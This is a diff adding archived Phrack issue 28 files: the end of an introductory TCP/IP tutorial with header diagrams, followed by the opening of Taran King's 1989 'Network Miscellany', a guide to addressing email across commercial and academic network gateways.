+   computers as if they were directly attached to yours.  (The
+   most commonly used protocol is the remote lineprinter protocol
+   from Berkeley Unix.  Unfortunately, there is no protocol
+   document for this.  However the C code is easily obtained from
+   Berkeley, so implementations are common.)
+
+-  Remote execution.  This allows you to request that a
+   particular program be run on a different computer.  This is
+   useful when you can do most of your work on a small computer,
+   but a few tasks require the resources of a larger system.
+   There are a number of different kinds of remote execution.
+   Some operate on a command by command basis.  That is, you
+   request that a specific command or set of commands should run
+   on some specific computer.  (More sophisticated versions will
+   choose a system that happens to be free.) However there are
+   also "remote procedure call" systems that allow a program to
+   call a subroutine that will run on another computer.  (There
+   are many protocols of this sort.  Berkeley Unix contains two
+   servers to execute commands remotely:  rsh and rexec.  The
+   Unix "man" pages describe the protocols that they use.  The
+   user-contributed software with Berkeley 4.3 contains a
+   "distributed shell" that will distribute tasks among a set of
+   systems, depending upon load.
+
+-  Name servers.  In large installations, there are a number of
+   different collections of names that have to be managed.  This
+   includes users and their passwords, names and network
+   addresses for computers, and accounts.  It becomes very
+   tedious to keep this data up to date on all of the computers.
+   Thus the databases are kept on a small number of systems.
+   Other systems access the data over the network.  (RFC 822 and
+   823 describe the name server protocol used to keep track of
+   host names and Internet addresses on the Internet.  This is
+   now a required part of any TCP/IP implementation.  IEN 116
+   describes an older name server protocol that is used by a few
+   terminal servers and other products to look up host names.
+   Sun's Yellow Pages system is designed as a general mechanism
+   to handle user names, file sharing groups, and other databases
+   commonly used by Unix systems.  It is widely available
+   commercially.  Its protocol definition is available from Sun.)
+
+-  Terminal servers.  Many installations no longer connect
+   terminals directly to computers.  Instead they connect them to
+   terminal servers.  A terminal server is simply a small
+   computer that only knows how to run telnet (or some other
+   protocol to do remote login).  If your terminal is connected
+   to one of these, you simply type the name of a computer, and
+   you are connected to it.  Generally it is possible to have
+   active connections to more than one computer at the same time.
+   The terminal server will have provisions to switch between
+   connections rapidly, and to notify you when output is waiting
+   for another connection.  (Terminal servers use the telnet
+   protocol, already mentioned.  However any real terminal server
+   will also have to support name service and a number of other
+   protocols.)
+
+-  Network-oriented window systems.  Until recently,
+   high-performance graphics programs had to execute on a
+   computer that had a bit-mapped graphics screen directly
+   attached to it.  Network window systems allow a program to use
+   a display on a different computer.  Full-scale network window
+   systems provide an interface that lets you distribute jobs to
+   the systems that are best suited to handle them, but still
+   give you a single graphically-based user interface.  (The most
+   widely-implemented window system is X.  A protocol description
+   is available from MIT's Project Athena.  A reference
+   implementation is publically available from MIT.  A number of
+   vendors are also supporting NeWS, a window system defined by
+   Sun.  Both of these systems are designed to use TCP/IP.)
+
+Note that some of the protocols described above were designed by
+Berkeley, Sun, or other organizations.  Thus they are not
+officially part of the Internet protocol suite.  However they are
+implemented using TCP/IP, just as normal TCP/IP application
+protocols are.  Since the protocol definitions are not considered
+proprietary, and since commercially-supported implementations are
+widely available, it is reasonable to think of these protocols as
+being effectively part of the Internet suite.
+
+Note that the list above is simply a sample of the sort of
+services available through TCP/IP.  However it does contain the
+majority of the "major" applications.  The other commonly-used
+protocols tend to be specialized facilities for getting
+information of various kinds, such as who is logged in, the time
+of day, etc.  However if you need a facility that is not listed
+here, I encourage you to look through the current edition of
+Internet Protocols (currently RFC 1011), which lists all of the
+available protocols, and also to look at some of the major TCP/IP
+implementations to see what various vendors have added.
+
+
+General Description Of The TCP/IP Protocols
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+TCP/IP is a layered set of protocols.  In order to understand
+what this means, it is useful to look at an example.  A typical
+situation is sending mail.  First, there is a protocol for mail.
+This defines a set of commands which one machine sends to
+another, e.g. commands to specify who the sender of the message
+is, who it is being sent to, and then the text of the message.
+However this protocol assumes that there is a way to communicate
+reliably between the two computers.  Mail, like other application
+protocols, simply defines a set of commands and messages to be
+sent.  It is designed to be used together with TCP and IP.
+
+TCP is responsible for making sure that the commands get through
+to the other end.  It keeps track of what is sent, and
+retransmitts anything that did not get through.  If any message
+is too large for one datagram, e.g. the text of the mail, TCP
+will split it up into several datagrams, and make sure that they
+all arrive correctly.  Since these functions are needed for many
+applications, they are put together into a separate protocol,
+rather than being part of the specifications for sending mail.
+You can think of TCP as forming a library of routines that
+applications can use when they need reliable network
+communications with another computer.
+
+Similarly, TCP calls on the services of IP.  Although the
+services that TCP supplies are needed by many applications, there
+are still some kinds of applications that don't need them.
+However there are some services that every application needs.  So
+these services are put together into IP.  As with TCP, you can
+think of IP as a library of routines that TCP calls on, but which
+is also available to applications that don't use TCP.  This
+strategy of building several levels of protocol is called
+"layering."  I like to think of the applications programs such as
+mail, TCP, and IP, as being separate "layers," each of which
+calls on the services of the layer below it.  Generally, TCP/IP
+applications use 4 layers:
+
+- An application protocol such as mail.
+
+- A protocol such as TCP that provides services need by many
+applications.
+
+- IP, which provides the basic service of getting datagrams to
+  their destination.
+
+- The protocols needed to manage a specific physical medium, such
+  as Ethernet or a point to point line.
+
+TCP/IP is based on the "catenet model."  (This is described in
+more detail in IEN 48.)  This model assumes that there are a
+large number of independent networks connected together by
+gateways.  The user should be able to access computers or other
+resources on any of these networks.  Datagrams will often pass
+through a dozen different networks before getting to their final
+destination.  The routing needed to accomplish this should be
+completely invisible to the user.  As far as the user is
+concerned, all he needs to know in order to access another system
+is an "Internet address."  This is an address that looks like
+128.6.4.194.  It is actually a 32-bit number.  However it is
+normally written as 4 decimal numbers, each representing 8 bits
+of the address.  (The term "octet" is used by Internet
+documentation for such 8-bit chunks.  The term "byte" is not
+used, because TCP/IP is supported by some computers that have
+byte sizes other than 8 bits.)
+
+Generally the structure of the address gives you some information
+about how to get to the system.  For example, 128.6 is a network
+number assigned by a central authority to Rutgers University.
+Rutgers uses the next octet to indicate which of the campus
+Ethernets is involved.  128.6.4 happens to be an Ethernet used by
+the Computer Science Department. The last octet allows for up to
+254 systems on each Ethernet.  (It is 254 because 0 and 255 are
+not allowed, for reasons that will be discussed later.)  Note
+that 128.6.4.194 and 128.6.5.194 would be different systems.  The
+structure of an Internet address is described in a bit more
+detail later.
+
+Of course I normally refer to systems by name, rather than by
+Internet address.  When I specify a name, the network software
+looks it up in a database, and comes up with the corresponding
+Internet address.  Most of the network software deals strictly in
+terms of the address.  (RFC 882 describes the name server
+technology used to handle this lookup.)
+
+TCP/IP is built on "connectionless" technology.  Information is
+transfered as a sequence of "datagrams."  A datagram is a
+collection of data that is sent as a single message.  Each of
+these datagrams is sent through the network individually.  There
+are provisions to open connections (i.e. to start a conversation
+that will continue for some time).  However at some level,
+information from those connections is broken up into datagrams,
+and those datagrams are treated by the network as completely
+separate.  For example, suppose you want to transfer a 15000
+octet file.  Most networks can't handle a 15000 octet datagram.
+So the protocols will break this up into something like 30
+500-octet datagrams.  Each of these datagrams will be sent to the
+other end.  At that point, they will be put back together into
+the 15000-octet file.  However while those datagrams are in
+transit, the network doesn't know that there is any connection
+between them.  It is perfectly possible that datagram 14 will
+actually arrive before datagram 13.  It is also possible that
+somewhere in the network, an error will occur, and some datagram
+won't get through at all.  In that case, that datagram has to be
+sent again.
+
+Note by the way that the terms "datagram" and "packet" often seem
+to be nearly interchangable.  Technically, datagram is the right
+word to use when describing TCP/IP.  A datagram is a unit of
+data, which is what the protocols deal with.  A packet is a
+physical thing, appearing on an Ethernet or some wire.  In most
+cases a packet simply contains a datagram, so there is very
+little difference.  However they can differ.  When TCP/IP is used
+on top of X.25, the X.25 interface breaks the datagrams up into
+128-byte packets.  This is invisible to IP, because the packets
+are put back together into a single datagram at the other end
+before being processed by TCP/IP.  So in this case, one IP
+datagram would be carried by several packets.  However with most
+media, there are efficiency advantages to sending one datagram
+per packet, and so the distinction tends to vanish.
+
+
+* The TCP level
+
+Two separate protocols are involved in handling TCP/IP datagrams.
+TCP (the "transmission control protocol") is responsible for
+breaking up the message into datagrams, reassembling them at the
+other end, resending anything that gets lost, and putting things
+back in the right order.  IP (the "internet protocol") is
+responsible for routing individual datagrams.  It may seem like
+TCP is doing all the work.  However in the Internet, simply
+getting a datagram to its destination can be a complex job.  A
+connection may require the datagram to go through several
+networks at Rutgers, a serial line to the John von Neuman
+Supercomputer Center, a couple of Ethernets there, a series of
+56Kbaud phone lines to another NSFnet site, and more Ethernets on
+another campus.  Keeping track of the routes to all of the
+destinations and handling incompatibilities among different
+transport media turns out to be a complex job.  Note that the
+interface between TCP and IP is fairly simple.  TCP simply hands
+IP a datagram with a destination.  IP doesn't know how this
+datagram relates to any datagram before it or after it.
+
+It may have occurred to you that something is missing here.  I
+have talked about Internet addresses, but not about how you keep
+track of multiple connections to a given system.  Clearly it
+isn't enough to get a datagram to the right destination.  TCP has
+to know which connection this datagram is part of.  This task is
+referred to as "demultiplexing."  In fact, there are several
+levels of demultiplexing going on in TCP/IP.  The information
+needed to do this demultiplexing is contained in a series of
+"headers."  A header is simply a few extra octets tacked onto the
+beginning of a datagram by some protocol in order to keep track
+of it.  It's a lot like putting a letter into an envelope and
+putting an address on the outside of the envelope.  Except with
+modern networks it happens several times.  It's like you put the
+letter into a little envelope, your secretary puts that into a
+somewhat bigger envelope, the campus mail center puts that
+envelope into a still bigger one, etc.  Here is an overview of
+the headers that get stuck on a message that passes through a
+typical TCP/IP network:
+
+It starts with a single data stream, say a file you are trying to
+send to some other computer:
+
+     ......................................................
+
+TCP breaks it up into manageable chunks.  (In order to do this,
+TCP has to know how large a datagram your network can handle.
+Actually, the TCP's at each end say how big a datagram they can
+handle, and then they pick the smallest size.)
+
+     .... .... .... .... .... .... .... ....
+
+TCP puts a header at the front of each datagram.  This header
+actually contains at least 20 octets, but the most important ones
+are a source and destination "port number" and a "sequence
+number."  The port numbers are used to keep track of different
+conversations.  Suppose 3 different people are transferring
+files.  Your TCP might allocate port numbers 1000, 1001, and 1002
+to these transfers.  When you are sending a datagram, this
+becomes the "source" port number, since you are the source of the
+datagram.  Of course the TCP at the other end has assigned a port
+number of its own for the conversation.  Your TCP has to know the
+port number used by the other end as well.  (It finds out when
+the connection starts, as I will explain below.)  It puts this in
+the "destination" port field.  Of course if the other end sends a
+datagram back to you, the source and destination port numbers
+will be reversed, since then it will be the source and you will
+be the destination.  Each datagram has a sequence number.  This
+is used so that the other end can make sure that it gets the
+datagrams in the right order, and that it hasn't missed any.
+(See the TCP specification for details.)  TCP doesn't number the
+datagrams, but the octets.  So if there are 500 octets of data in
+each datagram, the first datagram might be numbered 0, the second
+500, the next 1000, the next 1500, etc.  Finally, I will mention
+the Checksum.  This is a number that is computed by adding up all
+the octets in the datagram (more or less - see the TCP spec).
+The result is put in the header.  TCP at the other end computes
+the checksum again.  If they disagree, then something bad
+happened to the datagram in transmission, and it is thrown away.
+So here's what the datagram looks like now.
+
+       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+       |          Source Port           |       Destination Port       |
+       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+       |                         Sequence Number                       |
+       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+       |                      Acknowledgment Number                    |
+       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+       |  Data |           |U|A|P|R|S|F|                               |
+       | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
+       |       |           |G|K|H|T|N|N|                               |
+       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+       |           Checksum            |         Urgent Pointer        |
+       +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+       |   your data ... next 500 octets                               |
+       |   ......                                                      |
+
+If you abbreviate the TCP header as "T", the whole file now looks like this:
+
+     T.... T.... T.... T.... T.... T.... T....
+
+You will note that there are items in the header that I have not
+described above.  They are generally involved with managing the
+connection.  In order to make sure the datagram has arrived at
+its destination, the recipient has to send back an
+"acknowledgement."  This is a datagram whose "Acknowledgement
+number" field is filled in.  For example, sending a packet with
+an acknowledgement of 1500 indicates that you have received all
+the data up to octet number 1500.  If the sender doesn't get an
+acknowledgement within a reasonable amount of time, it sends the
+data again.  The window is used to control how much data can be
+in transit at any one time.  It is not practical to wait for each
+datagram to be acknowledged before sending the next one.  That
+would slow things down too much.  On the other hand, you can't
+just keep sending, or a fast computer might overrun the capacity
+of a slow one to absorb data.  Thus each end indicates how much
+new data it is currently prepared to absorb by putting the number
+of octets in its "Window" field.  As the computer receives data,
+the amount of space left in its window decreases.  When it goes
+to zero, the sender has to stop.  As the receiver processes the
+data, it increases its window, indicating that it is ready to
+accept more data. Often the same datagram can be used to
+acknowledge receipt of a set of data and to give permission for
+additional new data (by an updated window).  The "Urgent" field
+allows one end to tell the other to skip ahead in its processing
+to a particular octet.  This is often useful for handling
+asynchronous events, for example when you type a control
+character or other command that interrupts output.  The other
+fields are not pertinent to understanding what I am trying to
+explain in this article.
+
+
+* The IP Level
+
+TCP sends each datagram to IP.  Of course it has to tell IP the
+Internet address of the computer at the other end.  Note that
+this is all IP is concerned about.  It doesn't care about what is
+in the datagram, or even in the TCP header.  IP's job is simply
+to find a route for the datagram and get it to the other end.  In
+order to allow gateways or other intermediate systems to forward
+the datagram, it adds its own header.  The main things in this
+header are the source and destination Internet address (32-bit
+addresses, like 128.6.4.194), the protocol number, and another
+checksum.  The source Internet address is simply the address of
+your machine.  (This is necessary so the other end knows where
+the datagram came from.)  The destination Internet address is the
+address of the other machine.  (This is necessary so any gateways
+in the middle know where you want the datagram to go.)  The
+protocol number tells IP at the other end to send the datagram to
+TCP.
+
+Although most IP traffic uses TCP, there are other protocols that
+can use IP, so you have to tell IP which protocol to send the
+datagram to.  Finally, the checksum allows IP at the other end to
+verify that the header wasn't damaged in transit.  Note that TCP
+and IP have separate checksums.  IP needs to be able to verify
+that the header didn't get damaged in transit, or it could send a
+message to the wrong place.  It is both more efficient and safer
+to have TCP compute a separate checksum for the TCP header and
+data.  Once IP has tacked on its header, here's what the message
+looks like:
+
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |Version|  IHL  |Type of Service|          Total Length         |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |         Identification        |Flags|      Fragment Offset    |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |  Time to Live |    Protocol   |         Header Checksum       |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                       Source Address                          |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                    Destination Address                        |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |  TCP header, then your data ......                            |
+      |                                                               |
+
+If you represent the IP header by an "I", your file now looks like this:
+
+     IT....   IT....   IT....   IT....   IT....   IT....   IT....
+
+Again, the header contains some additional fields that will not
+be discussed in this article because they are not relevent to
+understanding the process.  The flags and fragment offset are
+used to keep track of the pieces when a datagram has to be split
+up.  This can happen when datagrams are forwarded through a
+network for which they are too big.  (This will be discussed a
+bit more below.) The time to live is a number that is decremented
+whenever the datagram passes through a system.  When it goes to
+zero, the datagram is discarded.  This is done in case a loop
+develops in the system somehow.  Of course this should be
+impossible, but well-designed networks are built to cope with
+"impossible" conditions.
+
+At this point, it's possible that no more headers are needed.  If
+your computer happens to have a direct phone line connecting it
+to the destination computer, or to a gateway, it may simply send
+the datagrams out on the line (though likely a synchronous
+protocol such as HDLC would be used, and it would add at least a
+few octets at the beginning and end).
+
+
+* The Ethernet Level
+
+Most networks these days use Ethernet which has its own
+addresses.  The people who designed Ethernet wanted to make sure
+that no two machines would end up with the same Ethernet address.
+Furthermore, they didn't want the user to have to worry about
+assigning addresses.  So each Ethernet controller comes with an
+address built-in from the factory.  In order to make sure that
+they would never have to reuse addresses, the Ethernet designers
+allocated 48 bits for the Ethernet address.  People who make
+Ethernet equipment have to register with a central authority, to
+make sure that the numbers they assign don't overlap any other
+manufacturer.  Ethernet is a "broadcast medium."  That is, it is
+in effect like an old party line telephone.  When you send a
+packet out on the Ethernet, every machine on the network sees the
+packet.  So something is needed to make sure that the right
+machine gets it.  As you might guess, this involves the Ethernet
+header.
+
+Every Ethernet packet has a 14-octet header that includes the
+source and destination Ethernet address, and a type code.  Each
+machine is supposed to pay attention only to packets with its own
+Ethernet address in the destination field.  (It's perfectly
+possible to cheat, which is one reason that Ethernet
+communications are not terribly secure.)  Note that there is no
+connection between the Ethernet address and the Internet address.
+Each machine has to have a table of what Ethernet address
+corresponds to what Internet address.  (I will describe how this
+table is constructed a bit later.)  In addition to the addresses,
+the header contains a type code.  The type code is to allow for
+several different protocol families to be used on the same
+network.  So you can use TCP/IP, DECnet, Xerox NS, etc. at the
+same time. Each of them will put a different value in the type
+field.  Finally, there is a checksum.  The Ethernet controller
+computes a checksum of the entire packet.  When the other end
+receives the packet, it recomputes the checksum, and throws the
+packet away if the answer disagrees with the original.  The
+checksum is put on the end of the packet, not in the header.  The
+final result is that your message looks like this:
+
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |       Ethernet destination address (first 32 bits)            |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      | Ethernet dest (last 16 bits)  |Ethernet source (first 16 bits)|
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |       Ethernet source address (last 32 bits)                  |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |        Type code              |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |  IP header, then TCP header, then your data                   |
+      |                                                               |
+          ...
+      |                                                               |
+      |   end of your data                                            |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+      |                       Ethernet Checksum                       |
+      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+If you represent the Ethernet header with "E", and the Ethernet
+checksum with "C", your file now looks like this:
+
+     EIT....C   EIT....C   EIT....C   EIT....C   EIT....C
+
+When these packets are received by the other end, of course all
+the headers are removed.  The Ethernet interface removes the
+Ethernet header and the checksum.  It looks at the type code.
+Since the type code is the one assigned to IP, the Ethernet
+device driver passes the datagram up to IP.  IP removes the IP
+header.  It looks at the IP protocol field.  Since the protocol
+type is TCP, it passes the datagram up to TCP.  TCP now looks at
+the sequence number.  It uses the sequence numbers and other
+information to combine all the datagrams into the original file.
+
+This ends my initial summary of TCP/IP.  There are still some
+crucial concepts I have not gotten to, so in part two, I will go
+back and add details in several areas.  (For detailed
+descriptions of the items discussed here see, RFC 793 for TCP,
+RFC 791 for IP, and RFC's 894 and 826 for sending IP over
+Ethernet.)
+__________________________________________________________________
diff --git a/phrack28/4.txt b/phrack28/4.txt
new file mode 100644
index 0000000..17029bb
--- /dev/null
+++ b/phrack28/4.txt
@@ -0,0 +1,631 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 28, File #4 of 12
+
+                              Network Miscellany
+                              ~~~~~~~~~~~~~~~~~~
+                                 by Taran King
+
+                                 June 1, 1989
+
+
+ACSNET
+~~~~~~
+Australian Computer Science Network (ACSNET), also known as Oz,
+has its gateway through the CSNET node munnari.oz.au and if you
+cannot directly mail to the .oz.au domain, try either
+username%munnari.oz.au@UUNET.UU.NET or
+munnari!username@UUNET.UU.NET.
+
+AT&T MAIL
+~~~~~~~~~
+AT&T Mail is a mailing service of AT&T, probably what you might
+call it's MCI-Mail equivalent.  It is available on the UUCP
+network as node name attmail but I've had problems having mail
+get through.  Apparently, it does cost money to mail to this
+service and the surrounding nodes are not willing to pick up the
+tab for the ingoing mail, or at least, this has seemingly been
+the case thus far.  I believe, though, that perhaps routing to
+att!attmail!user would work.
+
+AT&T recently announced six new X.400 interconnections between
+AT&T Mail and electronic mail services in the U.S., Korea,
+Sweden, Australia, and Finland.  In the U.S., AT&T Mail is now
+interconnected with Telenet Communications Corporation's service,
+Telemail, allowing users of both services to exchange messages
+easily.  With the addition of these interconnections, the AT&T
+Mail Gateway 400 Service allows AT&T Mail subscribers to exchange
+messages with users of the following electronic messaging
+systems:
+
+Company                    E-Mail Name*            Country
+-------                    ------------            -------
+TeleDelta                  TeDe 400                Sweden
+OTC                        MPS400                  Australia
+Telecom-Canada             Envoy100                Canada
+DACOM                      DACOM MHS               Korea
+P&T-Tele                   MailNet 400             Finland
+Helsinki Telephone Co.     ELISA                   Finland
+Dialcom                    Dialcom                 USA
+Telenet                    Telemail                USA
+KDD                        Messavia                Japan
+Transpac                   ATLAS400                France
+
+The interconnections are based on the X.400 standard, a set of
+guidelines for the format, delivery and receipt of electronic
+messages recommended by an international standards committee the
+CCITT.  International X.400 messages incur a surcharge.  They
+are:
+
+                 To Canada:
+                    Per note:            $.05
+                    Per message unit:    $.10
+
+                 To other international locations:
+                    Per note:            $.20
+                    Per message unit:    $.50
+
+There is no surcharge for X.400 messages within the U.S.  The
+following are contacts to speak with about mailing through these
+mentioned networks.  Other questions can be directed through AT&T
+Mail's toll-free number, 1-800-624-5672.
+
+MHS Gateway:  mhs!atlas                     MHS Gateway:  mhs!dacom
+Administrator:  Bernard Tardieu             Administrator:  Bob Nicholson
+Transpac                                    AT&T
+Phone:  3399283203                          Morristown, NJ  07960
+Phone:  +1 201 644 1838
+
+MHS Gateway:  mhs!dialcom                   MHS Gateway:  mhs!elisa
+Administrator:  Mr. Laraman                 Administrator:  Ulla Karajalainen
+Dialcom                                     Nokia Data
+South Plainfield, NJ  07080                 Phone:  01135804371
+Phone:  +1 441 493 3843
+
+MHS Gateway:  mhs!envoy                     MHS Gateway:  mhs!kdd
+Administrator:  Kin C. Ma                   Administrator:  Shigeo Lwase
+Telecom Canada                              Kokusai Denshin Denwa CO.
+Phone:  +1 613 567 7584                     Phone:  8133477419
+
+MHS Gateway:  mhs!mailnet                   MHS Gateway:  mhs!otc
+Administrator:  Kari Aakala                 Administrator:  Gary W. Krumbine
+Gen Directorate Of Post &                   AT&T Information Systems
+Phone:  35806921730                         Lincroft, NJ  07738
+                                            Phone:  +1 201 576 2658
+
+MHS Gateway:  mhs!telemail                  MHS Gateway:  mhs
+Administrator:  Jim Kelsay                  Administrator:  AT&T Mail MHS
+GTE Telenet Comm Corp                                       Gateway
+Reston, VA  22096                           AT&T
+Phone:  +1 703 689 6034                     Lincroft, NJ  08838
+                                            Phone:  +1 800 624 5672
+
+CMR
+~~~
+Previously known as Intermail, the Commercial Mail Relay (CMR)
+Service is a mail relay service between the Internet and three
+commercial electronic mail systems:  US Sprint/Telenet, MCI-Mail,
+and DIALCOM systems (i.e. Compmail, NSFMAIL, and USDA-MAIL).
+
+An important note:  The only requirement for using this mail
+gateway is that the work conducted must be DARPA sponsored
+research and other approved government business.  Basically, this
+means that unless you've got some government-related business,
+you're not supposed to be using this gateway.  Regardless, it
+would be very difficult for them to screen everything that goes
+through their gateway.  Before I understood the requirements of
+this gateway, I was sending to a user of MCI-Mail and was not
+contacted about any problems with that communication.
+Unfortunately, I mistyped the MCI-Mail address on one of the
+letters and that letter ended up getting read by system
+administrators who then informed me that I was not to be using
+that system, as well as the fact that they would like to bill me
+for using it.  That was an interesting thought on their part
+anyway, but do note that using this service does incur charges.
+
+The CMR mailbox address in each system corresponds to the label:
+
+          Telemail:  [Intermail/USCISI]TELEMAIL/USA
+          MCI-Mail:  Intermail      or      107-8239
+          CompMail:  Intermail      or      CMP0817
+          NSF-Mail:  Intermail      or      NSF153
+         USDA-Mail:  Intermail      or      AGS9999
+
+Addressing examples for each e-mail system are as follows:
+
+MCIMAIL:
+   123-4567             seven digit address
+   Everett T. Bowens    person's name (must be unique!)
+
+COMPMAIL:
+   CMP0123              three letters followed by three or four digits
+   S.Cooper             initial, then "." and then last name
+   134:CMP0123          domain, then ":" and then combination system and
+                        account number
+
+NSFMAIL:
+   NSF0123              three letters followed by three or four digits
+   A.Phillips           initial, then "." and then last name
+   157:NSF0123          domain, then ":" and then combination system and
+                         account number
+
+USDAMAIL:
+   AGS0123              three letters followed by three or four digits
+   P.Shifter            initial, then "." and then last name
+   157:AGS0123          domain, then ":" and then combination system and
+                         account number
+
+TELEMAIL:
+   BARNOC               user (directly on Telemail)
+   BARNOC/LODH          user/organization (directly on Telemail)
+   [BARNOC/LODH]TELEMAIL/USA
+                         [user/organization]system branch/country
+
+The following are other Telenet system branches/countries that
+can be mailed to:
+
+TELEMAIL/USA     NASAMAIL/USA     MAIL/USA            TELEMEMO/AUSTRALIA
+TELECOM/CANADA   TOMMAIL/CHILE    TMAILUK/GB          ITALMAIL/ITALY
+ATI/JAPAN        PIPMAIL/ROC      DGC/USA             FAAMAIL/USA
+GSFC/USA         GTEMAIL/USA      TM11/USA            TNET.TELEMAIL/USA
+USDA/USA
+
+     Note:  OMNET's ScienceNet is on the Telenet system MAIL/USA and to mail to
+it, the format would be [A.MAILBOX/OMNET]MAIL/USA.  The following are available
+subdivisions of OMNET:
+
+         AIR     Atmospheric Sciences
+         EARTH   Solid Earth Sciences
+         LIFE    Life Sciences
+         OCEAN   Ocean Sciences
+         POLAR   Interdisciplinary Polar Studies
+         SPACE   Space Science and Remote Sensing
+
+The following is a list of DIALCOM systems available in the
+listed countries with their domain and system numbers:
+
+Service Name            Country             Domain Number    System Number
+~~~~~~~~~~~~            ~~~~~~~             ~~~~~~~~~~~~~    ~~~~~~~~~~~~~
+Keylink-Dialcom         Australia           60               07, 08, 09
+Dialcom                 Canada              20               20, 21, 22, 23, 24
+DPT Databoks            Denmark             124              71
+Telebox                 Finland             127              62
+Telebox                 West Germany        30               15, 16
+Dialcom                 Hong Kong           80               88, 89
+Eirmail                 Ireland             100              74
+Goldnet                 Israel              50               05, 06
+Mastermail              Italy               130              65, 67
+Mastermail              Italy               1                66, 68
+Dialcom                 Japan               70               13, 14
+Dialcom                 Korea               1                52
+Telecom Gold            Malta               100              75
+Dialcom                 Mexico              1                52
+Memocom                 Netherlands         124              27, 28, 29
+Memocom                 Netherlands         1                55
+Starnet                 New Zealand         64               01, 02
+Dialcom                 Puerto Rico         58               25
+Telebox                 Singapore           88               10, 11, 12
+Dialcom                 Taiwan              1                52
+Telecom Gold            United Kingdom      100              01, 04, 17,
+80-89
+DIALCOM                 USA                 1                29, 30, 31, 32,
+                                                             33, 34, 37, 38,
+                                                             41-59, 61, 62, 63,
+                                                             90-99
+
+ NOTE:  You can also mail to username@NASAMAIL.NASA.GOV or
+        username@GSFCMAIL.NASA.GOV instead of going through the CMR gateway to
+        mail to NASAMAIL or GSFCMAIL.
+
+For more information and instructions on how to use CMR, send a
+message to the user support group at
+intermail-request@intermail.isi.edu (you'll get basically what
+I've listed plus maybe a bit more).  Please read Chapter 3 of The
+Future Transcendent Saga (Limbo to Infinity) for specifics on
+mailing to these destination mailing systems.
+
+COMPUSERVE
+~~~~~~~~~~
+CompuServe is well known for its games and conferences.  It does, though, have
+mailing capability.  Now, they have developed their own Internet domain, called
+COMPUSERVE.COM.  It is relatively new and mail can be routed through either
+TUT.CIS.OHIO-STATE.EDU or NORTHWESTERN.ARPA.
+
+Example: user%COMPUSERVE.COM@TUT.CIS.OHIO-STATE.EDU or replace
+         TUT.CIS.OHIO-STATE.EDU with NORTHWESTERN.ARPA).
+
+The CompuServe link appears to be a polled UUCP connection at the
+gateway machine.  It is actually managed via a set of shell
+scripts and a comm utility called xcomm, which operates via
+command scripts built on the fly by the shell scripts during
+analysis of what jobs exist to go into and out of CompuServe.
+
+CompuServe subscriber accounts of the form 7xxxx,yyyy can be
+addressed as 7xxxx.yyyy@compuserve.com.  CompuServe employees can
+be addressed by their usernames in the csi.compuserve.com
+subdomain.  CIS subscribers write mail to
+">inet:user@host.domain" to mail to users on the Wide-Area
+Networks, where ">gateway:" is CompuServe's internal gateway
+access syntax.  The gateway generates fully-RFC-compliant
+headers.
+
+To fully extrapolate -- from the CompuServe side, you would use
+their EasyPlex mail system to send mail to someone in BITNET or
+the Internet.   For example, to send me mail at my Bitnet id, you
+would address it to:
+
+            INET:C488869%UMCVMB.BITNET@CUNYVM.CUNY.EDU
+
+Or to my Internet id:
+
+            INET:C488869@UMCVMB.MISSOURI.EDU
+
+Now, if you have a BITNET to Internet userid, this is a silly
+thing to do, since your connect time to CompuServe costs you
+money.  However, you can use this information to let people on
+CompuServe contact YOU.  CompuServe Customer Service says that
+there is no charge to either receive or send a message to the
+Internet or BITNET.
+
+DASNET
+~~~~~~
+DASnet is a smaller network that connects to the Wide-Area
+Networks but charges for their service.  DASnet subscribers get
+charged for both mail to users on other networks AND mail for
+them from users of other networks.  The following is a brief
+description of DASnet, some of which was taken from their
+promotional text letter.
+
+DASnet allows you to exchange electronic mail with people on more
+than 20 systems and networks that are interconnected with DASnet.
+One of the drawbacks, though, is that, after being subscribed to
+these services, you must then subscribe to DASnet, which is a
